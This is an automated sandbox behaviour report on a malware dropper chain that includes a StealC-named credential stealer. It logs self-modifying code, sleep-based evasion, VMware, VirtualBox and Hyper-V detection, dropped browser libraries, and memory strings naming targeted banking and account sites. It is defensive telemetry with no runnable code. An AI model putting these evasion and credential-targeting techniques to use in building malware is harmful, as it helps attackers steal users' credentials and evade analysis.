Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C09CBB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C9DD2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: CBEC40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: CBC482 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E85543 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E62E29 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E59CBB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: EEDD2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Special instruction interceptor: First address: ACEA88 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Special instruction interceptor: First address: C7E71D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory allocated: B40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Memory allocated: 1A950000 memory reserve \| memory write watch

Source: C:\Windows\System32\svchost.exe	File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 6_2_04E10370 rdtsc

6_2_04E10370

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1100	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1102	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1055	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 955	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1107	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1149	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1152	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 917	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window / User API: threadDelayed 372
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window / User API: threadDelayed 364
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window / User API: threadDelayed 370
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window / User API: threadDelayed 390
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window / User API: threadDelayed 369
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Window / User API: threadDelayed 371

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\TPKOcaeSvfBbrcMznKuF.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AAKAL78BRQNYOCIR09Y.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API coverage: 5.3 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8092	Thread sleep count: 1100 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8092	Thread sleep time: -2201100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8096	Thread sleep count: 1102 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8096	Thread sleep time: -2205102s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084	Thread sleep count: 1055 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084	Thread sleep time: -2111055s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8072	Thread sleep count: 101 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8072	Thread sleep time: -3030000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8088	Thread sleep count: 955 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8088	Thread sleep time: -1910955s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8100	Thread sleep count: 1107 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8100	Thread sleep time: -2215107s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108	Thread sleep count: 1149 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108	Thread sleep time: -2299149s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112	Thread sleep count: 1152 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112	Thread sleep time: -2305152s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104	Thread sleep count: 917 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104	Thread sleep time: -1834917s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3632	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 1748	Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 2384	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe TID: 7664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7736	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 720	Thread sleep count: 372 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 720	Thread sleep time: -744372s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6976	Thread sleep count: 364 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6976	Thread sleep time: -728364s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 2028	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5724	Thread sleep count: 350 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5724	Thread sleep time: -700350s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 4812	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5428	Thread sleep count: 370 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5428	Thread sleep time: -740370s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3808	Thread sleep count: 390 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3808	Thread sleep time: -780390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6696	Thread sleep count: 334 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6696	Thread sleep time: -668334s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3836	Thread sleep count: 369 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3836	Thread sleep time: -738369s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3504	Thread sleep count: 371 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3504	Thread sleep time: -742371s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	17_2_0077E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00784910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_00784910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	17_2_0077BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_007716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_007716D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_0077F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00783EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	17_2_00783EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	17_2_0077DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_007838B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	17_2_007838B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_00784570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	17_2_00784570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	17_2_0077ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_0077DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_0077DE10

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00771160 GetSystemInfo,ExitProcess,

17_2_00771160

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cyBD74hgFSrUAP0/ypMI9rTGQDrKSl81mG0FZJNIeL
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.0000000001314000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2160616233.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3761965009.0000029989458000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: svchost.exe, 00000003.00000002.3753120064.0000023C2968A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: svchost.exe, 00000023.00000002.3754396295.0000029987E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: svchost.exe, 00000003.00000002.3751892147.0000023C2964E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C6000c298128b8c02a71a2474aeb5f3dc\|Virtual disk \|VMware
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:l/!
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
Source: file.exe, 00000006.00000003.1347135703.0000000001052000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: axplong.exe, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3471962829.0000000000C56000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
